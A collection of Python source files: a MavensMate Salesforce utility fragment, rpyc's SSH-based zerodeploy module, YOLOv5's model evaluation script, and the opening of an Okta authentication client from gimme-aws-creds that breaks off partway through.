message += 'MacOS ' + release
#todo: support windows and linux
except:
pass
# try to get the executable version
try:
dic = plistlib.readPlist('/Applications/MavensMate.app/Contents/Info.plist')
if 'CFBundleVersion' in dic:
message += ', MavensMate ' + dic['CFBundleVersion']
except:
pass
config.logger.exception("[MAVENSMATE CAUGHT ERROR]")
res = {
"success" : False,
"body_type" : "text",
"body" : message
}
return json.dumps(res)
except:
res = {
"success" : False,
"body_type" : "text",
"body" : message
}
return json.dumps(res)
def get_request_payload():
try:
if sys.stdin.isatty():
return {}
return json.loads(sys.stdin.read())
except ValueError, e:
#sys.exit(1)
return {}
def lower_keys(x):
if isinstance(x, list):
return [lower_keys(v) for v in x]
if isinstance(x, dict):
return dict((k.lower(), lower_keys(v)) for k, v in x.iteritems())
return x
#prepares the unit test result for processing by the jinja template
def process_unit_test_result(result):
config.logger.debug('>>>> RUN TEST RESULT')
config.logger.debug(result)
triggers = []
classes = []
if 'codeCoverage' in result:
# for single results we don't get a list back
if type(result['codeCoverage']) is not list:
result['codeCoverage'] = [result['codeCoverage']]
for coverage_result in result['codeCoverage']:
if 'locationsNotCovered' in coverage_result and type(coverage_result['locationsNotCovered']) is not list:
coverage_result['locationsNotCovered'] = [coverage_result['locationsNotCovered']]
if 'numLocations' in coverage_result and 'numLocationsNotCovered' in coverage_result:
locations = int(float(coverage_result['numLocations']))
locations_not_covered = int(float(coverage_result['numLocationsNotCovered']))
percent_covered = 0
if locations > 0:
percent_covered = int(round(100 * ((float(locations) - float(locations_not_covered)) / locations)))
coverage_result['percentCovered'] = percent_covered
if percent_covered < 40:
coverage_result['coverageLevel'] = 'danger'
elif percent_covered >= 40 and percent_covered < 75:
coverage_result['coverageLevel'] = 'warning'
elif percent_covered >= 75:
coverage_result['coverageLevel'] = 'success'
else:
coverage_result['coverageLevel'] = 'info'
if 'type' in coverage_result:
if coverage_result['type'] == 'Trigger':
triggers.append(coverage_result)
else:
classes.append(coverage_result)
elif 'id' in coverage_result:
result_id = coverage_result['id']
if result_id.startswith('01q'):
triggers.append(coverage_result)
else:
classes.append(coverage_result)
if 'codeCoverageWarnings' in result:
# for single results we don't get a list back
if type(result['codeCoverageWarnings']) is not list:
result['codeCoverageWarnings'] = [result['codeCoverageWarnings']]
for warning in result['codeCoverageWarnings']:
if 'name' in warning and type(warning['name']) is not str and type(warning['name']) is not unicode:
warning['name'] = None
results_normal = {}
#{"foo"=>[{:name = "foobar"}{:name = "something else"}], "bar"=>[]}
pass_fail = {}
if 'successes' in result:
# for single results we don't get a list back
if type(result['successes']) is not list:
result['successes'] = [result['successes']]
for success in result['successes']:
if success['name'] not in pass_fail:
pass_fail[success['name']] = {
'fail': 0,
'pass': 1
}
else:
pass_fail[success['name']]['pass'] += 1
if success['name'] not in results_normal: #key isn't there yet, put it in
results_normal[success['name']] = [success]
else: #key is there, let's add metadata to it
arr = results_normal[success['name']] #get the existing array
arr.append(success) #add the new piece of metadata
results_normal[success['name']] = arr #replace the key
if 'failures' in result:
# for single results we don't get a list back
if type(result['failures']) is not list:
result['failures'] = [result['failures']]
for failure in result['failures']:
if failure['name'] not in pass_fail:
pass_fail[failure['name']] = {
'fail': 1,
'pass': 0
}
else:
pass_fail[failure['name']]['fail'] += 1
if failure['name'] not in results_normal: #key isn't there yet, put it in
results_normal[failure['name']] = [failure]
else: #key is there, let's add metadata to it
arr = results_normal[failure['name']] #get the existing array
arr.append(failure) #add the new piece of metadata
results_normal[failure['name']] = arr #replace the key
result['pass_fail'] = pass_fail
result['results_normal'] = results_normal
result['codeCoverage'] = {
"triggers" : triggers,
"classes" : classes
}
return result
def get_file_extension_no_period(path):
name, ext = os.path.splitext(path)
return ext.replace(".", "")
def get_file_name_no_extension(path):
name, ext = os.path.splitext(path)
return name.split("/")[-1]
#returns metadata hash of selected files #=> {"ApexClass" => ["aclass", "anotherclass"], "ApexTrigger" => ["atrigger", "anothertrigger"]}
def get_metadata_hash(selected_files=[]):
meta_hash = {}
for f in selected_files:
if '-meta.xml' in f:
continue
name, ext = os.path.splitext(f)
base_name_no_ext = os.path.basename(f).split(".")[0]
ext_no_period = ext.replace(".", "")
metadata_definition = get_meta_type_by_suffix(ext_no_period)
meta_type = metadata_definition["xmlName"]
if meta_type not in meta_hash: #key isn't there yet, put it in
if metadata_definition['inFolder']:
arr = f.split("/")
if arr[len(arr)-2] != metadata_definition['directoryName']:
meta_hash[meta_type] = [arr[len(arr)-2]+"/"+base_name_no_ext] #file name with no extension
else:
meta_hash[meta_type] = [base_name_no_ext]
else:
meta_hash[meta_type] = [base_name_no_ext]
else: #key is there, let's add metadata to it
meta_array = meta_hash[meta_type] #get the existing array
if metadata_definition['inFolder']:
arr = f.split("/")
if arr[len(arr)-2] != metadata_definition['directoryName']:
meta_array.append(arr[len(arr)-2]+"/"+base_name_no_ext) #file name with no extension
else:
meta_array.append(base_name_no_ext) #add the new piece of metadata
else:
meta_array.append(base_name_no_ext) #file name with no extension
meta_hash[meta_type] = meta_array #replace the key
return meta_hash
def parse_deploy_result(res):
return_result = {
"id" : res["id"],
"success" : res["success"]
}
messages = parse_deploy_messages(res)
retrieve_result = {}
run_test_result = {}
if 'runTestResult' in res and type(res['runTestResult']) is not list:
return_result['runTestResult'] = [res['runTestResult']]
else:
return_result['runTestResult'] = res['runTestResult']
return return_result
def parse_deploy_messages(res):
messages = []
return_messages = []
if 'messages' in res and type(res['messages']) is not list:
messages = [res['messages']]
else:
messages = res['messages']
for m in messages:
return_messages.append({
"changed" : m["changed"],
"columnNumber" : m["columnNumber"],
"created" : m["created"],
"deleted" : m["deleted"],
"fileName" : m["fileName"],
"fullName" : m["fullName"],
"id" : m["id"],
"lineNumber" : m["lineNumber"],
"problem" : m["problem"],
"problemType" : m["problemType"],
"success" : m["success"]
})
return return_messages
def parse_run_test_result(res):
return_result = {}
return_run_tests = {}
code_coverage = []
code_coverage_return = []
code_coverage_warnings = []
failures = []
successes = []
if 'codeCoverage' in res['runTestResult'] and type(res['runTestResult']['codeCoverage']) is not list:
code_coverage = [res['runTestResult']['codeCoverage']]
else:
code_coverage = res['runTestResult']['codeCoverage']
if 'codeCoverageWarnings' in res['runTestResult'] and type(res['runTestResult']['codeCoverageWarnings']) is not list:
code_coverage_warnings = [res['runTestResult']['codeCoverageWarnings']]
else:
code_coverage_warnings = res['runTestResult']['codeCoverageWarnings']
if 'failures' in res['runTestResult'] and type(res['runTestResult']['failures']) is not list:
failures = [res['runTestResult']['failures']]
else:
failures = res['runTestResult']['failures']
if 'successes' in res['runTestResult'] and type(res['runTestResult']['successes']) is not list:
successes = [res['runTestResult']['successes']]
else:
successes = res['runTestResult']['successes']
for c in code_coverage:
code_coverage_return.append({
"changed" : m["changed"],
"columnNumber" : m["columnNumber"],
"created" : m["created"],
"deleted" : m["deleted"],
"fileName" : m["fileName"],
"fullName" : m["fullName"],
"id" : m["id"],
"lineNumber" : m["lineNumber"],
"problem" : m["problem"],
"problemType" : m["problemType"],
"success" : m["success"]
})
return_result['codeCoverage'] = code_coverage_return
return return_result
def grouper(n, iterable, fillvalue=None):
"grouper(3, 'ABCDEFG', 'x') --> ABC DEF Gxx"
args = [iter(iterable)] * n
return itertools.izip_longest(fillvalue=fillvalue, *args)
# def get_creds(project_directory):
# f = open(project_directory + "/config/settings.yaml")
# settings = yaml.safe_load(f)
# f.close()
# project_name = settings['project_name']
# username = settings['username']
# environment = settings['environment']
# password = get_password_by_project_name(project_name)
# endpoint = get_sfdc_endpoint_by_type(environment)
# return { "username" : username, "password" : password, "endpoint" : endpoint }
#returns array of selected files #=> ["/users/username/projects/foo/classes/myclass123.cls", /users/username/projects/foo/classes/myclass345.cls"]
# def get_selected_files(active_file=False):
# if active_file:
# return Array[ENV['TM_FILEPATH']]
# else:
# try:
# selected_files = ENV["TM_SELECTED_FILES"].split(",")
# #selected_files = Shellwords.shellwords(ENV["TM_SELECTED_FILES"])
# for f in selected_files:
# if '-meta.xml' in f:
# continue
# ext = File.extname(f).gsub(".","") #=> cls
# mt_hash = get_meta_type_by_suffix(ext)
# if mt_hash == None:
# selected_files.delete(f) #????
# continue
# if mt_hash[:meta_file]:
# if f + "-meta.xml" not in selected_files: #if they didn't select the meta file, select it anyway
# selected_files.append(f + "-meta.xml")
# selected_files.uniq!
# return selected_files
# except BaseException, e:
# return Array[ENV['TM_FILEPATH']]
|
zerodeploy.py
|
"""
.. versionadded:: 3.3
Requires [plumbum](http://plumbum.readthedocs.org/)
"""
from __future__ import with_statement
import rpyc
import socket
from rpyc.core.service import VoidService
from rpyc.core.stream import SocketStream
try:
from plumbum import local, ProcessExecutionError
from plumbum.path import copy
except ImportError:
import inspect
if any("sphinx" in line[1] or "docutils" in line[1] or "autodoc" in line[1] for line in inspect.stack()):
# let the sphinx docs be built without requiring plumbum installed
pass
else:
raise
SERVER_SCRIPT = r"""\
import sys
import os
import atexit
import shutil
from threading import Thread
here = os.path.dirname(__file__)
os.chdir(here)
def rmdir():
shutil.rmtree(here, ignore_errors = True)
atexit.register(rmdir)
try:
for dirpath, _, filenames in os.walk(here):
for fn in filenames:
if fn == "__pycache__" or (fn.endswith(".pyc") and os.path.exists(fn[:-1])):
os.remove(os.path.join(dirpath, fn))
except Exception:
pass
sys.path.insert(0, here)
from $MODULE$ import $SERVER$ as ServerCls
from rpyc import SlaveService
logger = None
$EXTRA_SETUP$
t = ServerCls(SlaveService, hostname = "localhost", port = 0, reuse_addr = True, logger = logger)
sys.stdout.write("%s\n" % (t.port,))
sys.stdout.flush()
try:
thd = Thread(target = t.start)
thd.setDaemon(True)
thd.start()
sys.stdin.read()
finally:
t.close()
thd.join(2)
"""
class DeployedServer(object):
"""
Sets up a temporary, short-lived RPyC deployment on the given remote machine. It will:
1. Create a temporary directory on the remote machine and copy RPyC's code
from the local machine to the remote temporary directory.
2. Start an RPyC server on the remote machine, binding to an arbitrary TCP port,
allowing only in-bound connections (``localhost`` connections). The server reports the
chosen port over ``stdout``.
3. An SSH tunnel is created from an arbitrary local port (on the local host), to the remote
machine's chosen port. This tunnel is authenticated and encrypted.
4. You get a ``DeployedServer`` object that can be used to connect to the newly-spawned server.
5. When the deployment is closed, the SSH tunnel is torn down, the remote server terminates
and the temporary directory is deleted.
:param remote_machine: a plumbum ``SshMachine`` or ``ParamikoMachine`` instance, representing
an SSH connection to the desired remote machine
:param server_class: the server to create (e.g., ``"ThreadedServer"``, ``"ForkingServer"``)
:param extra_setup: any extra code to add to the script
"""
def __init__(self, remote_machine, server_class = "rpyc.utils.server.ThreadedServer", extra_setup = ""):
self.proc = None
self.tun = None
self.remote_machine = remote_machine
self._tmpdir_ctx = None
rpyc_root = local.path(rpyc.__file__).up(2)
self._tmpdir_ctx = remote_machine.tempdir()
tmp = self._tmpdir_ctx.__enter__()
copy(rpyc_root, tmp)
script = (tmp / "deployed-rpyc.py")
modname, clsname = server_class.rsplit(".", 1)
script.write(SERVER_SCRIPT.replace("$MODULE$", modname).replace("$SERVER$", clsname).replace("$EXTRA_SETUP$", extra_setup))
self.proc = remote_machine.python.popen(script, new_session = True)
line = ""
try:
line = self.proc.stdout.readline()
self.remote_port = int(line.strip())
except Exception:
try:
self.proc.terminate()
except Exception:
pass
stdout, stderr = self.proc.communicate()
raise ProcessExecutionError(self.proc.argv, self.proc.returncode, line + stdout, stderr)
if hasattr(remote_machine, "connect_sock"):
# Paramiko: use connect_sock() instead of tunnels
self.local_port = None
else:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("localhost", 0))
self.local_port = s.getsockname()[1]
s.close()
self.tun = remote_machine.tunnel(self.local_port, self.remote_port)
def __del__(self):
self.close()
def __enter__(self):
return self
def __exit__(self, t, v, tb):
self.close()
def close(self):
if self.proc is not None:
try:
self.proc.terminate()
except Exception:
pass
self.proc = None
if self.tun is not None:
try:
self.tun.close()
except Exception:
pass
self.tun = None
if self._tmpdir_ctx is not None:
try:
self._tmpdir_ctx.__exit__(None, None, None)
except Exception:
pass
self._tmpdir_ctx = None
def connect(self, service = VoidService, config = {}):
"""Same as :func:`connect <rpyc.utils.factory.connect>`, but with the ``host`` and ``port``
parameters fixed"""
if self.local_port is None:
# ParamikoMachine
stream = SocketStream(self.remote_machine.connect_sock(self.remote_port))
return rpyc.connect_stream(stream, service = service, config = config)
else:
return rpyc.connect("localhost", self.local_port, service = service, config = config)
def classic_connect(self):
"""Same as :func:`classic.connect <rpyc.utils.classic.connect>`, but with the ``host`` and
``port`` parameters fixed"""
if self.local_port is None:
# ParamikoMachine
stream = SocketStream(self.remote_machine.connect_sock(self.remote_port))
return rpyc.classic.connect_stream(stream)
else:
return rpyc.classic.connect("localhost", self.local_port)
class MultiServerDeployment(object):
"""
An 'aggregate' server deployment to multiple SSH machine. It deploys RPyC to each machine
separately, but lets you manage them as a single deployment.
"""
def __init__(self, remote_machines, server_class = "ThreadedServer"):
self.remote_machines = remote_machines
# build the list incrementally, so we can clean it up if we have an exception
self.servers = [DeployedServer(mach, server_class) for mach in remote_machines]
def __del__(self):
self.close()
def __enter__(self):
return self
def __exit__(self, t, v, tb):
self.close()
def __iter__(self):
return iter(self.servers)
def __len__(self):
return len(self.servers)
def __getitem__(self, index):
return self.servers[index]
def close(self):
while self.servers:
s = self.servers.pop(0)
s.close()
def connect_all(self, service = VoidService, config = {}):
"""connects to all deployed servers; returns a list of connections (order guaranteed)"""
return [s.connect(service, config) for s in self.servers]
def classic_connect_all(self):
"""connects to all deployed servers using classic_connect; returns a list of connections (order guaranteed)"""
return [s.classic_connect() for s in self.servers]
|
test.py
|
import argparse
import json
import os
from pathlib import Path
from threading import Thread
import numpy as np
import torch
import yaml
from tqdm import tqdm
from models.experimental import attempt_load
from utils.datasets import create_dataloader
from utils.general import coco80_to_coco91_class, check_dataset, check_file, check_img_size, check_requirements, \
box_iou, non_max_suppression, scale_coords, xyxy2xywh, xywh2xyxy, set_logging, increment_path, colorstr
from utils.loss import compute_loss
from utils.metrics import ap_per_class, ConfusionMatrix
from utils.plots import plot_images, output_to_target, plot_study_txt
from utils.torch_utils import select_device, time_synchronized
def test(data,
weights=None,
batch_size=32,
imgsz=640,
conf_thres=0.001,
iou_thres=0.6, # for NMS
save_json=False,
single_cls=False,
augment=False,
verbose=False,
model=None,
dataloader=None,
save_dir=Path(''), # for saving images
save_txt=False, # for auto-labelling
save_hybrid=False, # for hybrid auto-labelling
save_conf=False, # save auto-label confidences
plots=True,
log_imgs=0): # number of logged images
# Initialize/load model and set device
training = model is not None
if training: # called by train.py
device = next(model.parameters()).device # get model device
else: # called directly
set_logging()
device = select_device(opt.device, batch_size=batch_size)
# Directories
save_dir = Path(increment_path(Path(opt.project) / opt.name, exist_ok=opt.exist_ok)) # increment run
(save_dir / 'labels' if save_txt else save_dir).mkdir(parents=True, exist_ok=True) # make dir
# Load model
model = attempt_load(weights, map_location=device) # load FP32 model
imgsz = check_img_size(imgsz, s=model.stride.max()) # check img_size
# Multi-GPU disabled, incompatible with .half() https://github.com/ultralytics/yolov5/issues/99
# if device.type != 'cpu' and torch.cuda.device_count() > 1:
# model = nn.DataParallel(model)
# Half
half = device.type != 'cpu' # half precision only supported on CUDA
if half:
model.half()
# Configure
model.eval()
is_coco = data.endswith('coco.yaml') # is COCO dataset
with open(data) as f:
data = yaml.load(f, Loader=yaml.FullLoader) # model dict
check_dataset(data) # check
nc = 1 if single_cls else int(data['nc']) # number of classes
iouv = torch.linspace(0.5, 0.95, 10).to(device) # iou vector for mAP@0.5:0.95
niou = iouv.numel()
# Logging
log_imgs, wandb = min(log_imgs, 100), None # ceil
try:
import wandb # Weights & Biases
except ImportError:
log_imgs = 0
# Dataloader
if not training:
img = torch.zeros((1, 3, imgsz, imgsz), device=device) # init img
_ = model(img.half() if half else img) if device.type != 'cpu' else None # run once
path = data['test'] if opt.task == 'test' else data['val'] # path to val/test images
dataloader = create_dataloader(path, imgsz, batch_size, model.stride.max(), opt, pad=0.5, rect=True,
prefix=colorstr('test: ' if opt.task == 'test' else 'val: '))[0]
seen = 0
confusion_matrix = ConfusionMatrix(nc=nc)
names = {k: v for k, v in enumerate(model.names if hasattr(model, 'names') else model.module.names)}
coco91class = coco80_to_coco91_class()
s = ('%20s' + '%12s' * 6) % ('Class', 'Images', 'Targets', 'P', 'R', 'mAP@.5', 'mAP@.5:.95')
p, r, f1, mp, mr, map50, map, t0, t1 = 0., 0., 0., 0., 0., 0., 0., 0., 0.
loss = torch.zeros(3, device=device)
jdict, stats, ap, ap_class, wandb_images = [], [], [], [], []
for batch_i, (img, targets, paths, shapes) in enumerate(tqdm(dataloader, desc=s)):
img = img.to(device, non_blocking=True)
img = img.half() if half else img.float() # uint8 to fp16/32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
targets = targets.to(device)
nb, _, height, width = img.shape # batch size, channels, height, width
with torch.no_grad():
# Run model
t = time_synchronized()
inf_out, train_out = model(img, augment=augment) # inference and training outputs
t0 += time_synchronized() - t
# Compute loss
if training:
loss += compute_loss([x.float() for x in train_out], targets, model)[1][:3] # box, obj, cls
# Run NMS
targets[:, 2:] *= torch.Tensor([width, height, width, height]).to(device) # to pixels
lb = [targets[targets[:, 0] == i, 1:] for i in range(nb)] if save_hybrid else [] # for autolabelling
t = time_synchronized()
output = non_max_suppression(inf_out, conf_thres=conf_thres, iou_thres=iou_thres, labels=lb)
t1 += time_synchronized() - t
# Statistics per image
for si, pred in enumerate(output):
labels = targets[targets[:, 0] == si, 1:]
nl = len(labels)
tcls = labels[:, 0].tolist() if nl else [] # target class
path = Path(paths[si])
seen += 1
if len(pred) == 0:
if nl:
stats.append((torch.zeros(0, niou, dtype=torch.bool), torch.Tensor(), torch.Tensor(), tcls))
continue
# Predictions
predn = pred.clone()
scale_coords(img[si].shape[1:], predn[:, :4], shapes[si][0], shapes[si][1]) # native-space pred
# Append to text file
if save_txt:
gn = torch.tensor(shapes[si][0])[[1, 0, 1, 0]] # normalization gain whwh
for *xyxy, conf, cls in predn.tolist():
xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh
line = (cls, *xywh, conf) if save_conf else (cls, *xywh) # label format
with open(save_dir / 'labels' / (path.stem + '.txt'), 'a') as f:
f.write(('%g ' * len(line)).rstrip() % line + '\n')
# W&B logging
if plots and len(wandb_images) < log_imgs:
box_data = [{"position": {"minX": xyxy[0], "minY": xyxy[1], "maxX": xyxy[2], "maxY": xyxy[3]},
"class_id": int(cls),
"box_caption": "%s %.3f" % (names[cls], conf),
"scores": {"class_score": conf},
"domain": "pixel"} for *xyxy, conf, cls in pred.tolist()]
boxes = {"predictions": {"box_data": box_data, "class_labels": names}} # inference-space
wandb_images.append(wandb.Image(img[si], boxes=boxes, caption=path.name))
# Append to pycocotools JSON dictionary
if save_json:
# [{"image_id": 42, "category_id": 18, "bbox": [258.15, 41.29, 348.26, 243.78], "score": 0.236}, ...
image_id = int(path.stem) if path.stem.isnumeric() else path.stem
box = xyxy2xywh(predn[:, :4]) # xywh
box[:, :2] -= box[:, 2:] / 2 # xy center to top-left corner
for p, b in zip(pred.tolist(), box.tolist()):
jdict.append({'image_id': image_id,
'category_id': coco91class[int(p[5])] if is_coco else int(p[5]),
'bbox': [round(x, 3) for x in b],
'score': round(p[4], 5)})
# Assign all predictions as incorrect
correct = torch.zeros(pred.shape[0], niou, dtype=torch.bool, device=device)
if nl:
detected = [] # target indices
tcls_tensor = labels[:, 0]
# target boxes
tbox = xywh2xyxy(labels[:, 1:5])
scale_coords(img[si].shape[1:], tbox, shapes[si][0], shapes[si][1]) # native-space labels
if plots:
confusion_matrix.process_batch(pred, torch.cat((labels[:, 0:1], tbox), 1))
# Per target class
for cls in torch.unique(tcls_tensor):
ti = (cls == tcls_tensor).nonzero(as_tuple=False).view(-1) # prediction indices
pi = (cls == pred[:, 5]).nonzero(as_tuple=False).view(-1) # target indices
# Search for detections
if pi.shape[0]:
# Prediction to target ious
ious, i = box_iou(predn[pi, :4], tbox[ti]).max(1) # best ious, indices
# Append detections
detected_set = set()
for j in (ious > iouv[0]).nonzero(as_tuple=False):
d = ti[i[j]] # detected target
if d.item() not in detected_set:
detected_set.add(d.item())
detected.append(d)
correct[pi[j]] = ious[j] > iouv # iou_thres is 1xn
if len(detected) == nl: # all targets already located in image
break
# Append statistics (correct, conf, pcls, tcls)
stats.append((correct.cpu(), pred[:, 4].cpu(), pred[:, 5].cpu(), tcls))
# Plot images
if plots and batch_i < 3:
f = save_dir / f'test_batch{batch_i}_labels.jpg' # labels
Thread(target=plot_images, args=(img, targets, paths, f, names), daemon=True).start()
f = save_dir / f'test_batch{batch_i}_pred.jpg' # predictions
Thread(target=plot_images, args=(img, output_to_target(output), paths, f, names), daemon=True).start()
# Compute statistics
stats = [np.concatenate(x, 0) for x in zip(*stats)] # to numpy
if len(stats) and stats[0].any():
p, r, ap, f1, ap_class = ap_per_class(*stats, plot=plots, save_dir=save_dir, names=names)
p, r, ap50, ap = p[:, 0], r[:, 0], ap[:, 0], ap.mean(1) # [P, R, AP@0.5, AP@0.5:0.95]
mp, mr, map50, map = p.mean(), r.mean(), ap50.mean(), ap.mean()
nt = np.bincount(stats[3].astype(np.int64), minlength=nc) # number of targets per class
else:
nt = torch.zeros(1)
# Print results
pf = '%20s' + '%12.3g' * 6 # print format
print(pf % ('all', seen, nt.sum(), mp, mr, map50, map))
# Print results per class
if (verbose or (nc <= 20 and not training)) and nc > 1 and len(stats):
for i, c in enumerate(ap_class):
print(pf % (names[c], seen, nt[c], p[i], r[i], ap50[i], ap[i]))
# Print speeds
t = tuple(x / seen * 1E3 for x in (t0, t1, t0 + t1)) + (imgsz, imgsz, batch_size) # tuple
if not training:
print('Speed: %.1f/%.1f/%.1f ms inference/NMS/total per %gx%g image at batch-size %g' % t)
# Plots
if plots:
confusion_matrix.plot(save_dir=save_dir, names=list(names.values()))
if wandb and wandb.run:
wandb.log({"Images": wandb_images})
wandb.log({"Validation": [wandb.Image(str(f), caption=f.name) for f in sorted(save_dir.glob('test*.jpg'))]})
# Save JSON
if save_json and len(jdict):
w = Path(weights[0] if isinstance(weights, list) else weights).stem if weights is not None else '' # weights
anno_json = '../coco/annotations/instances_val2017.json' # annotations json
pred_json = str(save_dir / f"{w}_predictions.json") # predictions json
print('\nEvaluating pycocotools mAP... saving %s...' % pred_json)
with open(pred_json, 'w') as f:
json.dump(jdict, f)
try: # https://github.com/cocodataset/cocoapi/blob/master/PythonAPI/pycocoEvalDemo.ipynb
from pycocotools.coco import COCO
from pycocotools.cocoeval import COCOeval
anno = COCO(anno_json) # init annotations api
pred = anno.loadRes(pred_json) # init predictions api
eval = COCOeval(anno, pred, 'bbox')
if is_coco:
eval.params.imgIds = [int(Path(x).stem) for x in dataloader.dataset.img_files] # image IDs to evaluate
eval.evaluate()
eval.accumulate()
eval.summarize()
map, map50 = eval.stats[:2] # update results (mAP@0.5:0.95, mAP@0.5)
except Exception as e:
print(f'pycocotools unable to run: {e}')
# Return results
if not training:
s = f"\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}" if save_txt else ''
print(f"Results saved to {save_dir}{s}")
model.float() # for training
maps = np.zeros(nc) + map
for i, c in enumerate(ap_class):
maps[c] = ap[i]
return (mp, mr, map50, map, *(loss.cpu() / len(dataloader)).tolist()), maps, t
if __name__ == '__main__':
parser = argparse.ArgumentParser(prog='test.py')
parser.add_argument('--weights', nargs='+', type=str, default='yolov5s.pt', help='model.pt path(s)')
parser.add_argument('--data', type=str, default='data/coco128.yaml', help='*.data path')
parser.add_argument('--batch-size', type=int, default=32, help='size of each image batch')
parser.add_argument('--img-size', type=int, default=640, help='inference size (pixels)')
parser.add_argument('--conf-thres', type=float, default=0.001, help='object confidence threshold')
parser.add_argument('--iou-thres', type=float, default=0.6, help='IOU threshold for NMS')
parser.add_argument('--task', default='val', help="'val', 'test', 'study'")
parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
parser.add_argument('--single-cls', action='store_true', help='treat as single-class dataset')
parser.add_argument('--augment', action='store_true', help='augmented inference')
parser.add_argument('--verbose', action='store_true', help='report mAP by class')
parser.add_argument('--save-txt', action='store_true', help='save results to *.txt')
parser.add_argument('--save-hybrid', action='store_true', help='save label+prediction hybrid results to *.txt')
parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels')
parser.add_argument('--save-json', action='store_true', help='save a cocoapi-compatible JSON results file')
parser.add_argument('--project', default='runs/test', help='save to project/name')
parser.add_argument('--name', default='exp', help='save to project/name')
parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
opt = parser.parse_args()
opt.save_json |= opt.data.endswith('coco.yaml')
opt.data = check_file(opt.data) # check file
print(opt)
check_requirements()
if opt.task in ['val', 'test']: # run normally
test(opt.data,
opt.weights,
opt.batch_size,
opt.img_size,
opt.conf_thres,
opt.iou_thres,
opt.save_json,
opt.single_cls,
opt.augment,
opt.verbose,
save_txt=opt.save_txt | opt.save_hybrid,
save_hybrid=opt.save_hybrid,
save_conf=opt.save_conf,
)
elif opt.task == 'study': # run over a range of settings and save/plot
for weights in ['yolov5s.pt', 'yolov5m.pt', 'yolov5l.pt', 'yolov5x.pt']:
f = 'study_%s_%s.txt' % (Path(opt.data).stem, Path(weights).stem) # filename to save to
x = list(range(320, 800, 64)) # x axis
y = [] # y axis
for i in x: # img-size
print('\nRunning %s point %s...' % (f, i))
r, _, t = test(opt.data, weights, opt.batch_size, i, opt.conf_thres, opt.iou_thres, opt.save_json,
plots=False)
y.append(r + t) # results and times
np.savetxt(f, y, fmt='%10.4g') # save
os.system('zip -r study.zip study_*.txt')
plot_study_txt(f, x) # plot
|
okta.py
|
"""
Copyright 2016-present Nike, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
You may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and* limitations under the License.*
"""
import base64
import getpass
import re
import time
import uuid
from codecs import decode
from urllib.parse import parse_qs
from urllib.parse import urlparse
import keyring
import requests
from bs4 import BeautifulSoup
from keyring.backends.fail import Keyring as FailKeyring
from keyring.errors import PasswordDeleteError
from requests.adapters import HTTPAdapter, Retry
from gimme_aws_creds.u2f import FactorU2F
from gimme_aws_creds.webauthn import WebAuthnClient, FakeAssertion
from . import errors, ui, version, duo
from multiprocessing import Process
import webbrowser
import socket
class OktaClient(object):
"""
The Okta Client Class performes the necessary API
calls to Okta to get temporary AWS credentials. An
Okta API key and URL must be provided.
"""
KEYRING_SERVICE = 'gimme-aws-creds'
KEYRING_ENABLED = not isinstance(keyring.get_keyring(), FailKeyring)
def __init__(self, gac_ui, okta_org_url, verify_ssl_certs=True, device_token=None):
"""
:type gac_ui: ui.UserInterface
:param okta_org_url: Base URL string for Okta IDP.
:param verify_ssl_certs: Enable/disable SSL verification
"""
self.ui = gac_ui
self._okta_org_url = okta_org_url
self._verify_ssl_certs = verify_ssl_certs
if verify_ssl_certs is False:
requests.packages.urllib3.disable_warnings()
self._username = None
self._password = None
self._preferred_mfa_type = None
self._mfa_code = None
self._remember_device = None
self._use_oauth_access_token = False
self._use_oauth_id_token = False
self._oauth_access_token = None
self._oauth_id_token = None
self._jar = requests.cookies.RequestsCookieJar()
# Allow up to 5 retries on requests to Okta in case we have network issues
self._http_client = requests.Session()
self._http_client.cookies = self._jar
self.device_token = device_token
retries = Retry(total=5, backoff_factor=1,
method_whitelist=['GET', 'POST'])
self._http_client.mount('https://', HTTPAdapter(max_retries=retries))
@property
def device_token(self):
return self._http_client.cookies.get('DT')
@device_token.setter
def device_token(self, device_token):
if device_token is not None:
match = re.search('^https://(.*)', self._okta_org_url)
self._http_client.cookies.set('DT', device_token, domain=match.group(1), path='/')
def set_username(self, username):
self._username = username
def set_password(self, password):
self._password = password
def set_preferred_mfa_type(self, preferred_mfa_type):
self._preferred_mfa_type = preferred_mfa_type
def set_mfa_code(self, mfa_code):
self._mfa_code = mfa_code
def set_remember_device(self, remember_device):
self._remember_device = bool(remember_device)
def use_oauth_access_token(self, val=True):
self._use_oauth_access_token = val
def use_oauth_id_token(self, val=True):
self._use_oauth_id_token = val
def stepup_auth(self, embed_link, state_token=None):
""" Login to Okta using the Step-up authentication flow"""
flow_state = self._get_initial_flow_state(embed_link, state_token)
while flow_state.get('apiResponse', {}).get('status') != 'SUCCESS':
time.sleep(0.5)
flow_state = self._next_login_step(
flow_state.get('stateToken'), flow_state.get('apiResponse'))
return flow_state['apiResponse']
def stepup_auth_saml(self, embed_link, state_token=None):
""" Login to a SAML-protected service using the Step-up authentication flow"""
api_response = self.stepup_auth(embed_link, state_token)
# if a session token is in the API response, we can use that to authenticate
if 'sessionToken' in api_response:
saml_response = self.get_saml_response(
embed_link + '?sessionToken=' + api_response['sessionToken'])
else:
saml_response = self.get_saml_response(
api_response['_links']['next']['href'])
login_result = self._http_client.post(
saml_response['TargetUrl'],
data=saml_response,
verify=self._verify_ssl_certs
)
return login_result.text
def auth(self):
""" Login to Okta using the authentication API"""
flow_state = self._login_username_password(None, self._okta_org_url + '/api/v1/authn')
while flow_state.get('apiResponse', {}).get('status') != 'SUCCESS':
time.sleep(0.5)
flow_state = self._next_login_step(
flow_state.get('apiResponse', {}).get('stateToken'), flow_state.get('apiResponse'))
return flow_state['apiResponse']
def auth_session(self, **kwargs):
""" Authenticate the user and return the Okta Session ID and username"""
login_response = self.auth()
session_url = self._okta_org_url + '/login/sessionCookieRedirect'
if 'redirect_uri' not in kwargs:
redirect_uri = 'http://localhost:8080/login'
